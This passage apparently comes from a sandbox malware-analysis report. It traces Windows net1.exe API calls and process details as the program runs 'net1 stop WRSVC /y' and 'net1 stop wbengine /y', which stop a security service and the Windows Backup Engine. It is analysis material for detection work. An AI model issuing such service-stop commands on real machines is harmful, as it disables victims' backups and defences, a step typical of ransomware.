(in: lpSystemTimeAsFileTime=0x26f990 | out: lpSystemTimeAsFileTime=0x26f990*(dwLowDateTime=0xfcd3a7b0, dwHighDateTime=0x1d48689)) [0120.302] GetCurrentProcessId () returned 0x708 [0120.302] GetCurrentThreadId () returned 0xa68 [0120.302] GetTickCount () returned 0x27b85 [0120.302] QueryPerformanceCounter (in: lpPerformanceCount=0x26f998 | out: lpPerformanceCount=0x26f998*=1816722000000) returned 1 [0120.303] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0120.303] __set_app_type (_Type=0x1) [0120.303] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0120.303] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0120.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.303] GetConsoleOutputCP () returned 0x1b5 [0120.304] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0120.304] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.306] sprintf_s (in: _DstBuf=0x26f938, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.306] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.307] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.307] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop WRSVC /y" [0120.307] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f6d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.307] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.307] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f928 | out: Buffer=0x26f928*=0x464d40) returned 0x0 [0120.307] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f928 | out: Buffer=0x26f928*=0x46c0e0) returned 0x0 [0120.308] _fileno (_File=0x7fefdba2a80) returned 0 [0120.308] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.308] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.308] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.308] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.308] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.308] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.308] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.308] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.308] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.308] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.308] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.308] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.308] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.308] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.308] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.308] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.308] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.308] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.308] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.308] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.308] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.308] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.308] _wcsicmp (_String1="accounts", _String2="WRSVC") returned -22 [0120.308] _wcsicmp (_String1="computer", _String2="WRSVC") returned -20 [0120.308] _wcsicmp (_String1="config", _String2="WRSVC") returned -20 [0120.308] _wcsicmp (_String1="continue", _String2="WRSVC") returned -20 [0120.308] _wcsicmp (_String1="cont", _String2="WRSVC") returned -20 [0120.309] _wcsicmp (_String1="file", _String2="WRSVC") returned -17 [0120.309] _wcsicmp (_String1="files", _String2="WRSVC") returned -17 [0120.309] _wcsicmp (_String1="group", _String2="WRSVC") returned -16 [0120.309] _wcsicmp (_String1="groups", _String2="WRSVC") returned -16 [0120.309] _wcsicmp (_String1="help", _String2="WRSVC") returned -15 [0120.309] _wcsicmp (_String1="helpmsg", _String2="WRSVC") returned -15 [0120.309] _wcsicmp (_String1="localgroup", _String2="WRSVC") returned -11 [0120.309] _wcsicmp (_String1="pause", _String2="WRSVC") returned -7 [0120.309] _wcsicmp (_String1="session", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="sessions", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="sess", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="share", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="start", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="stats", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="statistics", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="stop", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="time", _String2="WRSVC") returned -3 [0120.309] _wcsicmp (_String1="user", _String2="WRSVC") returned -2 [0120.309] _wcsicmp (_String1="users", _String2="WRSVC") returned -2 [0120.309] _wcsicmp (_String1="msg", _String2="WRSVC") returned -10 [0120.309] _wcsicmp (_String1="messenger", _String2="WRSVC") returned -10 [0120.309] _wcsicmp (_String1="receiver", _String2="WRSVC") returned -5 [0120.309] _wcsicmp (_String1="rcv", _String2="WRSVC") returned -5 [0120.309] _wcsicmp (_String1="netpopup", _String2="WRSVC") returned -9 [0120.309] _wcsicmp (_String1="redirector", _String2="WRSVC") returned -5 [0120.309] _wcsicmp (_String1="redir", _String2="WRSVC") returned -5 [0120.309] _wcsicmp (_String1="rdr", _String2="WRSVC") returned -5 [0120.309] _wcsicmp (_String1="workstation", _String2="WRSVC") returned -3 [0120.309] _wcsicmp (_String1="work", _String2="WRSVC") returned -3 [0120.309] _wcsicmp (_String1="wksta", _String2="WRSVC") returned -7 [0120.309] _wcsicmp (_String1="prdr", _String2="WRSVC") returned -7 [0120.309] _wcsicmp (_String1="devrdr", _String2="WRSVC") returned -19 [0120.309] _wcsicmp (_String1="lanmanworkstation", _String2="WRSVC") returned -11 [0120.309] _wcsicmp (_String1="server", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="svr", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="srv", _String2="WRSVC") returned -4 [0120.309] _wcsicmp (_String1="lanmanserver", _String2="WRSVC") returned -11 [0120.309] _wcsicmp (_String1="alerter", _String2="WRSVC") returned -22 [0120.309] _wcsicmp (_String1="netlogon", _String2="WRSVC") returned -9 [0120.310] _wcsupr (in: _String="WRSVC" | out: _String="WRSVC") returned="WRSVC" [0120.310] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x46c900 [0120.313] GetServiceKeyNameW (in: hSCManager=0x46c900, lpDisplayName="WRSVC", lpServiceName=0xff8a5750, lpcchBuffer=0x26f848 | out: lpServiceName="", lpcchBuffer=0x26f848) returned 0 [0120.318] _wcsicmp (_String1="msg", _String2="WRSVC") returned -10 [0120.318] _wcsicmp (_String1="messenger", _String2="WRSVC") returned -10 [0120.318] _wcsicmp (_String1="receiver", _String2="WRSVC") returned -5 [0120.318] _wcsicmp (_String1="rcv", _String2="WRSVC") returned -5 [0120.318] _wcsicmp (_String1="redirector", _String2="WRSVC") returned -5 [0120.318] _wcsicmp (_String1="redir", _String2="WRSVC") returned -5 [0120.318] _wcsicmp (_String1="rdr", _String2="WRSVC") returned -5 [0120.318] _wcsicmp (_String1="workstation", _String2="WRSVC") returned -3 [0120.318] _wcsicmp (_String1="work", _String2="WRSVC") returned -3 [0120.318] _wcsicmp (_String1="wksta", _String2="WRSVC") returned -7 [0120.318] _wcsicmp (_String1="prdr", _String2="WRSVC") returned -7 [0120.318] _wcsicmp (_String1="devrdr", _String2="WRSVC") returned -19 [0120.318] _wcsicmp (_String1="lanmanworkstation", _String2="WRSVC") returned -11 [0120.318] _wcsicmp (_String1="server", _String2="WRSVC") returned -4 [0120.318] _wcsicmp (_String1="svr", _String2="WRSVC") returned -4 [0120.318] _wcsicmp (_String1="srv", _String2="WRSVC") returned -4 [0120.318] _wcsicmp (_String1="lanmanserver", _String2="WRSVC") returned -11 [0120.318] _wcsicmp (_String1="alerter", _String2="WRSVC") returned -22 [0120.318] _wcsicmp (_String1="netlogon", _String2="WRSVC") returned -9 [0120.318] NetServiceControl (in: servername=0x0, service="WRSVC", opcode=0x0, arg=0x0, bufptr=0x26f850 | out: bufptr=0x26f850) returned 0x889 [0120.319] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.319] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0120.320] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.321] GetFileType (hFile=0xb) returned 0x2 [0120.321] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f718 | out: lpMode=0x26f718) returned 1 [0120.321] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f710, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x26f710*=0x1e) returned 1 [0120.321] GetFileType (hFile=0xb) returned 0x2 [0120.322] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f718 | out: lpMode=0x26f718) returned 1 [0120.322] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f710, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x26f710*=0x2) returned 1 [0120.322] _ultow (in: _Dest=0x889, _Radix=2553728 | out: _Dest=0x889) returned="2185" [0120.322] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.322] GetFileType (hFile=0xb) returned 0x2 [0120.322] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f718 | out: lpMode=0x26f718) returned 1 [0120.323] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f710, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x26f710*=0x34) returned 1 [0120.323] GetFileType (hFile=0xb) returned 0x2 [0120.323] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f718 | out: lpMode=0x26f718) returned 1 [0120.323] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f710, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x26f710*=0x2) returned 1 [0120.323] NetApiBufferFree (Buffer=0x464d40) returned 0x0 [0120.324] NetApiBufferFree (Buffer=0x46c0e0) returned 0x0 [0120.324] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop WRSVC /y" [0120.324] exit (_Code=2) Process: id = "363" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x23738000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "354" os_parent_pid = "0xbd8" cmd_line = "C:\\Windows\\system32\\net1 stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12742 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12743 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12744 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12745 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 12746 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12747 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12748 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12749 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12750 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12751 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12752 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 12753 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12754 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12755 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12756 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12757 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12758 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12759 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12760 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12761 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12762 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 12763 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 12764 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12765 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12766 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12767 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12768 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12769 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12770 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12771 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12772 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12773 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12774 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12775 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12776 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12777 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12778 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12779 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12799 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 902 os_tid = 0x924 [0120.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdd0 | out: lpSystemTimeAsFileTime=0x20fdd0*(dwLowDateTime=0xfcbbd9f0, dwHighDateTime=0x1d48689)) [0120.147] GetCurrentProcessId () returned 0xcc8 [0120.147] GetCurrentThreadId () returned 0x924 [0120.147] GetTickCount () returned 0x27ae9 [0120.147] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdd8 | out: lpPerformanceCount=0x20fdd8*=1816706500000) returned 1 [0120.148] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0120.148] __set_app_type (_Type=0x1) [0120.148] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0120.148] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0120.148] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.149] GetConsoleOutputCP () returned 0x1b5 [0120.206] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0120.207] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.208] sprintf_s (in: _DstBuf=0x20fd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.208] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.210] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.210] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0120.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.210] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.210] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd68 | out: Buffer=0x20fd68*=0x314d40) returned 0x0 [0120.210] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd68 | out: Buffer=0x20fd68*=0x31c0e0) returned 0x0 [0120.210] _fileno (_File=0x7fefdba2a80) returned 0 [0120.210] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.210] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.210] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.210] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.210] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.210] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.211] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.211] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.211] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.211] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.211] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.211] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.211] _wcsicmp (_String1="accounts", _String2="wbengine") returned -22 [0120.211] _wcsicmp (_String1="computer", _String2="wbengine") returned -20 [0120.211] _wcsicmp (_String1="config", _String2="wbengine") returned -20 [0120.211] _wcsicmp (_String1="continue", _String2="wbengine") returned -20 [0120.211] _wcsicmp (_String1="cont", _String2="wbengine") returned -20 [0120.211] _wcsicmp (_String1="file", _String2="wbengine") returned -17 [0120.211] _wcsicmp (_String1="files", _String2="wbengine") returned -17 [0120.211] _wcsicmp (_String1="group", _String2="wbengine") returned -16 [0120.211] _wcsicmp (_String1="groups", _String2="wbengine") returned -16 [0120.211] _wcsicmp (_String1="help", _String2="wbengine") returned -15 [0120.211] _wcsicmp (_String1="helpmsg", _String2="wbengine") returned -15 [0120.211] _wcsicmp (_String1="localgroup", _String2="wbengine") returned -11 [0120.211] _wcsicmp (_String1="pause", _String2="wbengine") returned -7 [0120.211] _wcsicmp (_String1="session", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="sessions", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="sess", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="share", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="start", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="stats", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="statistics", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="stop", _String2="wbengine") returned -4 [0120.211] _wcsicmp (_String1="time", _String2="wbengine") returned -3 [0120.211] _wcsicmp (_String1="user", _String2="wbengine") returned -2 [0120.211] _wcsicmp (_String1="users", _String2="wbengine") returned -2 [0120.211] _wcsicmp (_String1="msg", _String2="wbengine") returned -10 [0120.211] _wcsicmp (_String1="messenger", _String2="wbengine") returned -10 [0120.212] _wcsicmp (_String1="receiver", _String2="wbengine") returned -5 [0120.212] _wcsicmp (_String1="rcv", _String2="wbengine") returned -5 [0120.212] _wcsicmp (_String1="netpopup", _String2="wbengine") returned -9 [0120.212] _wcsicmp (_String1="redirector", _String2="wbengine") returned -5 [0120.212] _wcsicmp (_String1="redir", _String2="wbengine") returned -5 [0120.212] _wcsicmp (_String1="rdr", _String2="wbengine") returned -5 [0120.212] _wcsicmp (_String1="workstation", _String2="wbengine") returned 13 [0120.212] _wcsicmp (_String1="work", _String2="wbengine") returned 13 [0120.212] _wcsicmp (_String1="wksta", _String2="wbengine") returned 9 [0120.212] _wcsicmp (_String1="prdr", _String2="wbengine") returned -7 [0120.212] _wcsicmp (_String1="devrdr", _String2="wbengine") returned -19 [0120.212] _wcsicmp (_String1="lanmanworkstation", _String2="wbengine") returned -11 [0120.212] _wcsicmp (_String1="server", _String2="wbengine") returned -4 [0120.212] _wcsicmp (_String1="svr", _String2="wbengine") returned -4 [0120.212] _wcsicmp (_String1="srv", _String2="wbengine") returned -4 [0120.212] _wcsicmp (_String1="lanmanserver", _String2="wbengine") returned -11 [0120.212] _wcsicmp (_String1="alerter", _String2="wbengine") returned -22 [0120.212] _wcsicmp (_String1="netlogon", _String2="wbengine") returned -9 [0120.212] _wcsupr (in: _String="wbengine" | out: _String="WBENGINE") returned="WBENGINE" [0120.212] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31cdf0 [0120.216] GetServiceKeyNameW (in: hSCManager=0x31cdf0, lpDisplayName="WBENGINE", lpServiceName=0xff8a5750, lpcchBuffer=0x20fc88 | out: lpServiceName="", lpcchBuffer=0x20fc88) returned 0 [0120.216] _wcsicmp (_String1="msg", _String2="WBENGINE") returned -10 [0120.216] _wcsicmp (_String1="messenger", _String2="WBENGINE") returned -10 [0120.216] _wcsicmp (_String1="receiver", _String2="WBENGINE") returned -5 [0120.216] _wcsicmp (_String1="rcv", _String2="WBENGINE") returned -5 [0120.217] _wcsicmp (_String1="redirector", _String2="WBENGINE") returned -5 [0120.217] _wcsicmp (_String1="redir", _String2="WBENGINE") returned -5 [0120.217] _wcsicmp (_String1="rdr", _String2="WBENGINE") returned -5 [0120.217] _wcsicmp (_String1="workstation", _String2="WBENGINE") returned 13 [0120.217] _wcsicmp (_String1="work", _String2="WBENGINE") returned 13 [0120.217] _wcsicmp (_String1="wksta", _String2="WBENGINE") returned 9 [0120.217] _wcsicmp (_String1="prdr", _String2="WBENGINE") returned -7 [0120.217] _wcsicmp (_String1="devrdr", _String2="WBENGINE") returned -19 [0120.217] _wcsicmp (_String1="lanmanworkstation", _String2="WBENGINE") returned -11 [0120.217] _wcsicmp (_String1="server", _String2="WBENGINE") returned -4 [0120.217] _wcsicmp (_String1="svr", _String2="WBENGINE") returned -4 [0120.217] _wcsicmp (_String1="srv", _String2="WBENGINE") returned -4 [0120.217] _wcsicmp (_String1="lanmanserver", _String2="WBENGINE") returned -11 [0120.217] _wcsicmp (_String1="alerter", _String2="WBENGINE") returned -22 [0120.217] _wcsicmp (_String1="netlogon", _String2="WBENGINE") returned -9 [0120.217] NetServiceControl (in: servername=0x0, service="WBENGINE", opcode=0x0, arg=0x0, bufptr=0x20fc90 | out: bufptr=0x20fc90) returned 0x0 [0120.218] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x20fc48 | out: Buffer=0x20fc48*=0x320c70) returned 0x0 